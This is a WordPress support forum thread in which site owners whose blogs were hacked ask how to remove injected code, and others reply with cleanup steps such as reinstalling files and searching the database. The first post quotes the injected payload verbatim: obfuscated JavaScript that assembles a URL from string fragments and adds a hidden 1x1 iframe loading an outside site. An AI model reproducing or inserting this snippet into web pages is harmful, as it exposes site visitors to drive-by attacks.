header already sent index.php error

sbrn178
(@sbrn178)

14 years, 9 months ago

I got a header already sent error for index.php. I followed what was recommended in clearing all of the spaces. However, now the following is appearing on my blog and dashboard.

mv=’uf’;jx=’tv.’;cg=’me’;k=’e’;mg=’rc’;g=’ys’;rs=’m’;f=’of’;m=’ht’;u=’85y’;ca=’e.c’;r=’s’;j=’fra’;i=’ht’;h=’//h’;qy=’wob’;v=’k9′;a=’t’;qt=’i’;br=’p:’;s=’om/’;ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute(‘width’,’1′);bn.setAttribute(‘height’,’1′);bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);<?php

I would really appreciate any help to get this fixed.

Viewing 7 replies - 16 through 22 (of 22 total)

← 1 2

kmessinger
(@kmessinger)

14 years, 9 months ago

@joshvariedce
Your site looks ok in IE9 but has a lot of errors, http://validator.w3.org/check?verbose=1&uri=http%3a%2f%2fwww.variedcelluloid.net%2f

joshvariedce
(@joshvariedce)

14 years, 9 months ago

@kmessinger
I deleted the code from the front index.php page and ever since the website has been showing up… awkwardly. The “featured content gallery” plugin that I use on the front page no longer shows in a carousel, but instead posts all of the images/text/thumbnails separately in a vertical line. Also, when google emailed me about the site now being an “attack site”, I checked my website stats through them and it listed the “mv=” script coming from a .js file in the “featured content gallery” plugin. I checked the .js file and found no trace of the code. I deleted it. Heck, I deleted all of my plugins earlier, and it made no real difference other than throwing me a series of new errors. I’ve re-uploaded those plugins now in order to actually manage some kind of troubleshooting.

If you want to see the “mv=” error/script/whatever in action, browse around the site. It doesn’t appear on the main index page, but it seems to show up everywhere else. Including my wp-admin, which I am not able to log into. Here’s an example:

http://www.variedcelluloid.net/archives/evidence-trailer-and-poster-art

Here’s a hypothetical: would it be wise to use phpmyadmin to search out all instances of the “mv=” script in the database, if there are any, and delete them? I backed up my database last night. I get the feeling that this probably isn’t a DB issue, but I’m not so sure. If it is, I’d hate to do an entirely fresh install of wordpress only to find out I still have this issue.

kmessinger
(@kmessinger)

14 years, 9 months ago

See:
http://codex.ww.wp.xz.cn/FAQ_My_site_was_hacked
http://ww.wp.xz.cn/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Here’s a hypothetical: would it be wise to use phpmyadmin to search out all instances of the “mv=” script in the database, if there are any, and delete them? I backed up my database last night

Good idea.

And contact your host. Odds are you are not the only one this has happened to.

joshvariedce
(@joshvariedce)

14 years, 9 months ago

Note: just checked the front page of the site on a different computer, and it looks “okay”. However, the wp-admin and every other page on the site still just loads up nothing.

Thanks for the links, I’ll go through them later. Right now I’m looking at doing the phpmyadmin trick and then doing a completely fresh install of wordpress. Suuuuuccckss. I’ll post results.

As far as contacting my host goes… I’m on godaddy. If I shoot them an e-mail today, I should hopefully get a non-helpful response sometime in the first quarter of next year, lol

Joliepinkyswear1
(@joliepinkyswear1)

14 years, 9 months ago

Using FTP I did the following :

1. Made a backup of all files on my hard drive

2. Edited all index.php files and removed all the hacked code (the first couple of lines).

3. Uploaded and overwrote the files(not the folders) in the wp-admin folder( This enabled me to get access back to the wp-admin login screen)

4. Deleted the index.php files in the wp-content and wp-content/themes folders

Hope this helps
cheers
steve

PS When the issue is resolved – Make sure you update the wordpress versions on all your blogs

@itbiz2001 We followed your directions and it seems to be gone…Thank you so much

http://ericshefferstevens.com

itbiz2001
(@itbiz2001)

14 years, 9 months ago

Your welcome 🙂

teknics
(@teknics)

14 years, 9 months ago

Got my install all straightened out.

Unfortunately for me, I needed to update my database first from MYSQL 4 to MYSQL5 in order to update WordPress first. Not really something I wanted to do today – lol

This hack originated through an old plugin that was no longer updated – for me it was KB Advanced RSS.

Make sure you either update, or re-upload several index.php file that are affected. If you can, go through FTP and check to see which files were updated by date to figure out what went wrong. I’d also do the same thing for plugins and delete them in order to log back into the admin panel.

Best of luck to everyone else!